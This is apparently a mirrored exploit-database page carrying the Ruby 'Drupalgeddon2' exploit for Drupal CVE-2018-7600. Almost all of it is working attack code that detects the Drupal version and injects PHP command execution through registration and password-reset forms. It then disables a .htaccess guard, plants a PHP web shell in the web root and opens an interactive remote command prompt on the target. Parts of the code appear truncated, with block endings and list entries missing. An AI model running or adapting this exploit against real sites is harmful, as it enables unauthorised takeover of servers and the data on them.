Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution

  • 作者: Hans Topo & g0tmi1k
    日期: 2018-04-13
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/44449/
  • #!/usr/bin/env ruby
    # [CVE-2018-7600] Drupal <= 8.5.0 / <= 8.4.5 / <= 8.3.8 / 7.23 <= 7.57 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/
    # Authors:
    # - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked
    # - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k
    require 'base64'
    require 'json'
    require 'net/http'
    require 'openssl'
    require 'readline'
    require 'highline/import'
    # Settings - Try to write a PHP to the web root?
    try_phpshell = true
    # Settings - General/Stealth
    $useragent = "drupalgeddon2"
    webshell = "shell.php"
    # Settings - Proxy information (nil to disable)
    $proxy_addr = nil
    $proxy_port = 8080
    # Settings - Payload (we could just be happy without this PHP shell, by using just the OS shell - but this is 'better'!)
    bashcmd = "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }"
    bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d"
    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    # Function http_request <url> [type] [data]
    def http_request(url, type="get", payload="", cookie="")
    puts verbose("HTTP - URL : #{url}") if $verbose
    puts verbose("HTTP - Type: #{type}") if $verbose
    puts verbose("HTTP - Data: #{payload}") if not payload.empty? and $verbose
    uri = URI(url)
    request = type =~ /get/? Net::HTTP::Get.new(uri.request_uri) : Net::HTTP::Post.new(uri.request_uri)
    request.initialize_http_header({"User-Agent" => $useragent})
    request.initialize_http_header("Cookie" => cookie) if not cookie.empty?
    request.body = payload if not payload.empty?
    return $http.request(request)
    rescue SocketError
    puts error("Network connectivity issue")
    rescue Errno::ECONNREFUSED => e
    puts error("The target is down ~ #{e.message}")
    puts error("Maybe try disabling the proxy (#{$proxy_addr}:#{$proxy_port})...") if $proxy_addr
    rescue Timeout::Error => e
    puts error("The target timed out ~ #{e.message}")
    # If we got here, something went wrong.
    # Function gen_evil_url <cmd> [method] [shell] [phpfunction]
    def gen_evil_url(evil, element="", shell=false, phpfunction="passthru")
    puts info("Payload: #{evil}") if not shell
    puts verbose("Element: #{element}") if not shell and not element.empty? and $verbose
    puts verbose("PHP fn : #{phpfunction}") if not shell and $verbose
    # Vulnerable parameters: #access_callback / #lazy_builder / #pre_render / #post_render
    # Check the version to match the payload
    if $drupalverion.start_with?("8") and element == "mail"
    # Method #1 - Drupal v8.x: mail, #post_render - HTTP 200
    url = $target + $clean_url + $form + "?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
    payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpfunction + "&mail[a][#type]=markup&mail[a][#markup]=" + evil
    elsif $drupalverion.start_with?("8") and element == "timezone"
    # Method #2 - Drupal v8.x: timezone, #lazy_builder - HTTP 500 if phpfunction=exec // HTTP 200 if phpfunction=passthru
    url = $target + $clean_url + $form + "?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
    payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=" + phpfunction + "&timezone[a][#lazy_builder][][]=" + evil
    #puts warning("WARNING: May benefit to use a PHP web shell") if not try_phpshell and phpfunction != "passthru"
    elsif $drupalverion.start_with?("7") and element == "name"
    # Method #3 - Drupal v7.x: name, #post_render - HTTP 200
    url = $target + "#{$clean_url}#{$form}&name[%23post_render][]=" + phpfunction + "&name[%23type]=markup&name[%23markup]=" + evil
    payload = "form_id=user_pass&_triggering_element_name=name"
    # Drupal v7.x needs an extra value from a form
    if $drupalverion.start_with?("7")
    response = http_request(url, "post", payload, $session_cookie)
    form_name = "form_build_id"
    puts verbose("Form name: #{form_name}") if $verbose
    form_value = response.body.match(/input type="hidden" name="#{form_name}" value="(.*)"/).to_s.slice(/value="(.*)"/, 1).to_s.strip
    puts warning("WARNING: Didn't detect #{form_name}") if form_value.empty?
    puts verbose("Form value : #{form_value}") if $verbose
    url = $target + "#{$clean_url}file/ajax/name/%23value/" + form_value
    payload = "#{form_name}=#{form_value}"
    return url, payload
    # Function clean_result <input>
    def clean_result(input)
    #result = JSON.pretty_generate(JSON[response.body])
    #result = $drupalverion.start_with?("8")? JSON.parse(clean)[0]["data"] : clean
    clean = input.to_s.strip
    # PHP function: passthru
    # For: <payload>[{"command":"insert","method":"replaceWith","selector":null,"data":"\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}]
    # PHP function: exec
    # For: [{"command":"insert","method":"replaceWith","selector":null,"data":"<payload>\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}]
    #clean.slice!(/\\u003Cspan class=\\u0022.*}\]$/)
    # Newer PHP for an older Drupal
    # For: <b>Deprecated</b>:assert(): Calling assert() with a string argument is deprecated in <b>/var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php</b> on line <b>151</b><br />
    #clean.slice!(/<b>.*<br \/>/)
    # Drupal v8.x Method #2 ~ timezone, #lazy_builder, passthru, HTTP 500
    # For: <b>Deprecated</b>:assert(): Calling assert() with a string argument is deprecated in <b>/var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php</b> on line <b>151</b><br />
    clean.slice!(/The website encountered an unexpected error.*/)
    return clean
    # Feedback when something goes right
    def success(text)
    # Green
    return "\e[#{32}m[+]\e[0m #{text}"
    # Feedback when something goes wrong
    def error(text)
    # Red
    return "\e[#{31}m[-]\e[0m #{text}"
    # Feedback when something may have issues
    def warning(text)
    # Yellow
    return "\e[#{33}m[!]\e[0m #{text}"
    # Feedback when something doing something
    def action(text)
    # Blue
    return "\e[#{34}m[*]\e[0m #{text}"
    # Feedback with helpful information
    def info(text)
    # Light blue
    return "\e[#{94}m[i]\e[0m #{text}"
    # Feedback for the overkill
    def verbose(text)
    # Dark grey
    return "\e[#{90}m[v]\e[0m #{text}"
    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def init_authentication()
    $uname = ask('Enter your username:') { |q| q.echo = false }
    $passwd = ask('Enter your password:') { |q| q.echo = false }
    $uname_field = ask('Enter the name of the username form field:') { |q| q.echo = true }
    $passwd_field = ask('Enter the name of the password form field:') { |q| q.echo = true }
    $login_path = ask('Enter your login path (e.g., user/login):') { |q| q.echo = true }
    $creds_suffix = ask('Enter the suffix eventually required after the credentials in the login HTTP POST request (e.g., &form_id=...):') { |q| q.echo = true }
    def is_arg(args, param)
    args.each do |arg|
    if arg == param
    return true
    return false
    # Quick how to use
    def usage()
    puts 'Usage: ruby drupalggedon2.rb <target> [--authentication] [--verbose]'
    puts 'Example for target that does not require authentication:'
    puts ' ruby drupalgeddon2.rb https://example.com'
    puts 'Example for target that does require authentication:'
    puts ' ruby drupalgeddon2.rb https://example.com --authentication'
    # Read in values
    if ARGV.empty?
    $target = ARGV[0]
    init_authentication() if is_arg(ARGV, '--authentication')
    $verbose = is_arg(ARGV, '--verbose')
    # Check input for protocol
    $target = "http://#{$target}" if not $target.start_with?("http")
    # Check input for the end
    $target += "/" if not $target.end_with?("/")
    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    # Banner
    puts action("--==[::#Drupalggedon2::]==--")
    puts "-"*80
    puts info("Target : #{$target}")
    puts info("Proxy: #{$proxy_addr}:#{$proxy_port}") if $proxy_addr
    puts info("Write? : Skipping writing PHP web shell") if not try_phpshell
    puts "-"*80
    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    # Setup connection
    uri = URI($target)
    $http = Net::HTTP.new(uri.host, uri.port, $proxy_addr, $proxy_port)
    # Use SSL/TLS if needed
    if uri.scheme == "https"
    $http.use_ssl = true
    $http.verify_mode = OpenSSL::SSL::VERIFY_NONE
    $session_cookie = ''
    # If authentication required then login and get session cookie
    if $uname
    $payload = $uname_field + '=' + $uname + '&' + $passwd_field + '=' + $passwd + $creds_suffix
    response = http_request($target + $login_path, 'post', $payload, $session_cookie)
    if (response.code == '200' or response.code == '303') and not response.body.empty? and response['set-cookie']
    $session_cookie = response['set-cookie'].split('; ')[0]
    puts success("Logged in - Session Cookie : #{$session_cookie}")
    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    # Try and get version
    $drupalverion = ""
    # Possible URLs
    url = [
    # --- changelog ---
    # Drupal v6.x / v7.x [200]
    $target + "CHANGELOG.txt",
    # Drupal v8.x [200]
    $target + "core/CHANGELOG.txt",
    # --- bootstrap ---
    # Drupal v7.x / v6.x [403]
    $target + "includes/bootstrap.inc",
    # Drupal v8.x [403]
    $target + "core/includes/bootstrap.inc",
    # --- database ---
    # Drupal v7.x / v6.x[403]
    $target + "includes/database.inc",
    # Drupal v7.x [403]
    #$target + "includes/database/database.inc",
    # Drupal v8.x [403]
    #$target + "core/includes/database.inc",
    # --- landing page ---
    # Drupal v8.x / v7.x [200]
    # Check all
    url.each do|uri|
    # Check response
    response = http_request(uri, 'get', '', $session_cookie)
    # Check header
    if response['X-Generator'] and $drupalverion.empty?
    header = response['X-Generator'].slice(/Drupal (.*) \(https:\/\/www.drupal.org\)/, 1).to_s.strip
    if not header.empty?
    $drupalverion = "#{header}.x" if $drupalverion.empty?
    puts success("Header : v#{header} [X-Generator]")
    puts verbose("X-Generator: #{response['X-Generator']}") if $verbose
    # Check request response, valid
    if response.code == "200"
    tmp = $verbose ?"[HTTP Size: #{response.size}]": ""
    puts success("Found: #{uri}(HTTP Response: #{response.code})#{tmp}")
    # Check to see if it says: The requested URL "http://<URL>" was not found on this server.
    puts warning("WARNING: Could be a false-positive [1-1], as the file could be reported to be missing") if response.body.downcase.include? "was not found on this server"
    # Check to see if it says: <h1 class="js-quickedit-page-title title page-title">Page not found</h1> <div class="content">The requested page could not be found.</div>
    puts warning("WARNING: Could be a false-positive [1-2], as the file could be reported to be missing") if response.body.downcase.include? "the requested page could not be found"
    # Only works for CHANGELOG.txt
    if uri.match(/CHANGELOG.txt/)
    # Check if valid. Source ~ https://api.drupal.org/api/drupal/core%21CHANGELOG.txt/8.5.x // https://api.drupal.org/api/drupal/CHANGELOG.txt/7.x
    puts warning("WARNING: Unable to detect keyword 'drupal.org'") if not response.body.downcase.include? "drupal.org"
    # Patched already? (For Drupal v8.4.x / v7.x)
    puts warning("WARNING: Might be patched! Found SA-CORE-2018-002: #{url}") if response.body.include? "SA-CORE-2018-002"
    # Try and get version from the file contents (For Drupal v8.4.x / v7.x)
    $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip
    # Blank if not valid
    $drupalverion = "" if not $drupalverion[-1] =~ /\d/
    # Check meta tag
    if not response.body.empty?
    # For Drupal v8.x / v7.x
    meta = response.body.match(/<meta name="Generator" content="Drupal (.*) /)
    metatag = meta.to_s.slice(/meta name="Generator" content="Drupal (.*) \(http/, 1).to_s.strip
    if not metatag.empty?
    $drupalverion = "#{metatag}.x" if $drupalverion.empty?
    puts success("Metatag: v#{$drupalverion} [Generator]")
    puts verbose(meta.to_s) if $verbose
    # Done! ...if a full known version, else keep going... may get lucky later!
    break if not $drupalverion.end_with?("x") and not $drupalverion.empty?
    # Check request response, not allowed
    if response.code == "403" and $drupalverion.empty?
    tmp = $verbose ?"[HTTP Size: #{response.size}]": ""
    puts success("Found: #{uri}(HTTP Response: #{response.code})#{tmp}")
    if $drupalverion.empty?
    # Try and get version from the URL (For Drupal v.7.x/v6.x)
    $drupalverion = uri.match(/includes\/database.inc/)? "7.x/6.x" : "" if $drupalverion.empty?
    # Try and get version from the URL (For Drupal v8.x)
    $drupalverion = uri.match(/core/)? "8.x" : "" if $drupalverion.empty?
    # If we got something, show it!
    puts success("URL: v#{$drupalverion}?") if not $drupalverion.empty?
    tmp = $verbose ?"[HTTP Size: #{response.size}]": ""
    puts warning("MISSING: #{uri}(HTTP Response: #{response.code})#{tmp}")
    # Feedback
    if not $drupalverion.empty?
    status = $drupalverion.end_with?("x")? "?" : "!"
    puts success("Drupal#{status}: v#{$drupalverion}")
    puts error("Didn't detect Drupal version")
    if not $drupalverion.start_with?("8") and not $drupalverion.start_with?("7")
    puts error("Unsupported Drupal version (#{$drupalverion})")
    puts "-"*80
    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    # The attack vector to use
    $form = $drupalverion.start_with?("8")? "user/register" : "user/password"
    # Make a request, check for form
    url = "#{$target}?q=#{$form}"
    puts action("Testing: Form (#{$form})")
    response = http_request(url, 'get', '', $session_cookie)
    if response.code == "200" and not response.body.empty?
    puts success("Result : Form valid")
    elsif response['location']
    puts error("Target is NOT exploitable [5] (HTTP Response: #{response.code})... Could try following the redirect: #{response['location']}")
    elsif response.code == "404"
    puts error("Target is NOT exploitable [4] (HTTP Response: #{response.code})... Form disabled?")
    elsif response.code == "403"
    puts error("Target is NOT exploitable [3] (HTTP Response: #{response.code})... Form blocked?")
    elsif response.body.empty?
    puts error("Target is NOT exploitable [2] (HTTP Response: #{response.code})... Got an empty response")
    puts warning("WARNING: Target may NOT exploitable [1] (HTTP Response: #{response.code})")
    puts "- "*40
    # Make a request, check for clean URLs status ~ Enabled: /user/register Disabled: /?q=user/register
    # Drupal v7.x needs it anyway
    $clean_url = $drupalverion.start_with?("8")? "" : "?q="
    url = "#{$target}#{$form}"
    puts action("Testing: Clean URLs")
    response = http_request(url, 'get', '', $session_cookie)
    if response.code == "200" and not response.body.empty?
    puts success("Result : Clean URLs enabled")
    $clean_url = "?q="
    puts warning("Result : Clean URLs disabled (HTTP Response: #{response.code})")
    puts verbose("response.body: #{response.body}") if $verbose
    # Drupal v8.x needs it to be enabled
    if $drupalverion.start_with?("8")
    puts error("Sorry dave... Required for Drupal v8.x... So... NOPE NOPE NOPE")
    elsif $drupalverion.start_with?("7")
    puts info("Isn't an issue for Drupal v7.x")
    puts "-"*80
    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    # Values in gen_evil_url for Drupal v8.x
    elementsv8 = [
    # Values in gen_evil_url for Drupal v7.x
    elementsv7 = [
    elements = $drupalverion.start_with?("8") ? elementsv8 : elementsv7
    elements.each do|e|
    $element = e
    # Make a request, testing code execution
    puts action("Testing: Code Execution (Method: #{$element})")
    # Generate a random string to see if we can echo it
    random = (0...8).map { (65 + rand(26)).chr }.join
    url, payload = gen_evil_url("echo #{random}", e)
    response = http_request(url, "post", payload, $session_cookie)
    if (response.code == "200" or response.code == "500") and not response.body.empty?
    result = clean_result(response.body)
    if not result.empty?
    puts success("Result : #{result}")
    if response.body.match(/#{random}/)
    puts success("Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!")
    puts warning("WARNING: Target MIGHT be exploitable [4]... Detected output, but didn't MATCH expected result")
    puts warning("WARNING: Target MIGHT be exploitable [3] (HTTP Response: #{response.code})... Didn't detect any INJECTED output (disabled PHP function?)")
    puts warning("WARNING: Target MIGHT be exploitable [5]... Blind attack?") if response.code == "500"
    puts verbose("response.body: #{response.body}") if $verbose
    puts verbose("clean_result: #{result}") if not result.empty? and $verbose
    elsif response.body.empty?
    puts error("Target is NOT exploitable [2] (HTTP Response: #{response.code})... Got an empty response")
    puts error("Target is NOT exploitable [1] (HTTP Response: #{response.code})")
    puts verbose("response.body: #{response.body}") if $verbose
    puts "- "*40 if e != elements.last
    puts "-"*80
    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    # Location of web shell & used to signal if using PHP shell
    webshellpath = ""
    prompt = "drupalgeddon2"
    # Possibles paths to try
    paths = [
    # Web root
    # Required for setup
    # They did something "wrong", chmod -R 0777 .
    # Check all (if doing web shell)
    paths.each do|path|
    # Check to see if there is already a file there
    puts action("Testing: Existing file (#{$target}#{path}#{webshell})")
    response = http_request("#{$target}#{path}#{webshell}", 'get', '', $session_cookie)
    if response.code == "200"
    puts warning("Response: HTTP #{response.code} // Size: #{response.size}. ***Something could already be there?***")
    puts info("Response: HTTP #{response.code} // Size: #{response.size}")
    puts "- "*40
    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    folder = path.empty? ? "./" : path
    puts action("Testing: Writing To Web Root (#{folder})")
    # Merge locations
    webshellpath = "#{path}#{webshell}"
    # Final command to execute
    cmd = "#{bashcmd} | tee #{webshellpath}"
    # By default, Drupal v7.x disables the PHP engine using: ./sites/default/files/.htaccess
    # ...however, Drupal v8.x disables the PHP engine using: ./.htaccess
    if path == "sites/default/files/"
    puts action("Moving : ./sites/default/files/.htaccess")
    cmd = "mv -f #{path}.htaccess #{path}.htaccess-bak; #{cmd}"
    # Generate evil URLs
    url, payload = gen_evil_url(cmd, $element)
    # Make the request
    response = http_request(url, "post", payload, $session_cookie)
    # Check result
    if response.code == "200" and not response.body.empty?
    # Feedback
    result = clean_result(response.body)
    puts success("Result : #{result}") if not result.empty?
    # Test to see if backdoor is there (if we managed to write it)
    response = http_request("#{$target}#{webshellpath}", "post", "c=hostname", $session_cookie)
    if response.code == "200" and not response.body.empty?
    puts success("Very Good News Everyone! Wrote to the web root! Waayheeeey!!!")
    elsif response.code == "404"
    puts warning("Target is NOT exploitable [2-4] (HTTP Response: #{response.code})... Might not have write access?")
    elsif response.code == "403"
    puts warning("Target is NOT exploitable [2-3] (HTTP Response: #{response.code})... May not be able to execute PHP from here?")
    elsif response.body.empty?
    puts warning("Target is NOT exploitable [2-2] (HTTP Response: #{response.code})... Got an empty response back")
    puts warning("Target is NOT exploitable [2-1] (HTTP Response: #{response.code})")
    puts verbose("response.body: #{response.body}") if $verbose
    elsif response.code == "500" and not response.body.empty?
    puts warning("Target MAY of been exploited... Bit of blind leading the blind")
    elsif response.code == "404"
    puts warning("Target is NOT exploitable [1-4] (HTTP Response: #{response.code})... Might not have write access?")
    elsif response.code == "403"
    puts warning("Target is NOT exploitable [1-3] (HTTP Response: #{response.code})... May not be able to execute PHP from here?")
    elsif response.body.empty?
    puts warning("Target is NOT exploitable [1-2] (HTTP Response: #{response.code}))... Got an empty response back")
    puts warning("Target is NOT exploitable [1-1] (HTTP Response: #{response.code})")
    puts verbose("response.body: #{response.body}") if $verbose
    webshellpath = ""
    puts "- "*40 if path != paths.last
    end if try_phpshell
    # If a web path was set, we exploited using PHP!
    if not webshellpath.empty?
    # Get hostname for the prompt
    prompt = response.body.to_s.strip if response.code == "200" and not response.body.empty?
    puts "-"*80
    puts info("Fake PHP shell: curl '#{$target}#{webshellpath}' -d 'c=hostname'")
    # Should we be trying to call commands via PHP?
    elsif try_phpshell
    puts warning("FAILED : Couldn't find a writeable web path")
    puts "-"*80
    puts action("Dropping back to direct OS commands")
    # Stop any CTRL + C action ;)
    trap("INT", "SIG_IGN")
    # Forever loop
    loop do
    # Default value
    result = "~ERROR~"
    # Get input
    command = Readline.readline("#{prompt}>> ", true).to_s
    # Check input
    puts warning("WARNING: Detected an known bad character (>)") if command =~ />/
    # Exit
    break if command == "exit"
    # Blank link?
    next if command.empty?
    # If PHP web shell
    if not webshellpath.empty?
    # Send request
    result = http_request("#{$target}#{webshellpath}", "post", "c=#{command}", $session_cookie).body
    # Direct OS commands
    url, payload = gen_evil_url(command, $element, true)
    response = http_request(url, "post", payload, $session_cookie)
    # Check result
    if not response.body.empty?
    result = clean_result(response.body)
    # Feedback
    puts result